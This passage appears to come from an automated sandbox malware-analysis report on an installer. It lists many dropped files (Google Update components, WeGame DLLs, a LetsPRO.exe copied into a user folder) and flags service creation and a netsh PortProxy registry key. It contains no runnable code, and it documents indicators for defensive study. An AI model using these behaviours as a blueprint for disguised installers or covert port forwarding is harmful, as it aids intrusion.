Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ja.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ko.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\psuser_64.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\WeGame\beacon_sdk.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sl.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ChromeSetup.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fil.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-CN.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fa.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ms.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\WeGame\common.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB59C.tmp Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_tr.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hr.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ru.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB54D.tmp Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hi.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_nl.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ro.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_it.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_vi.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sv.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en-GB.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB404.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_uk.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sk.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-TW.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_da.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ml.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pl.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB5FB.tmp Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ur.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_kn.dll Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe File created: C:\Users\user\99944\LetsPRO.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lt.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es-419.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_mr.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\WeGame\adapt_for_imports.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_el.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_de.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\WeGame\Lua51.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-BR.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_th.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fi.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_gu.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sr.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\psuser.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\WeGame\WeGame.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lv.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_id.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe Jump to dropped file
Drops PE files to the program root directory (C:\Program Files)
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ChromeSetup.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB404.tmp Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB5FB.tmp Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB59C.tmp Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB54D.tmp Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC9575C GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW, 30_2_6CC9575C
Creates or modifies windows services
Source: C:\Windows\System32\netsh.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCAA005 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle, 30_2_6CCAA005
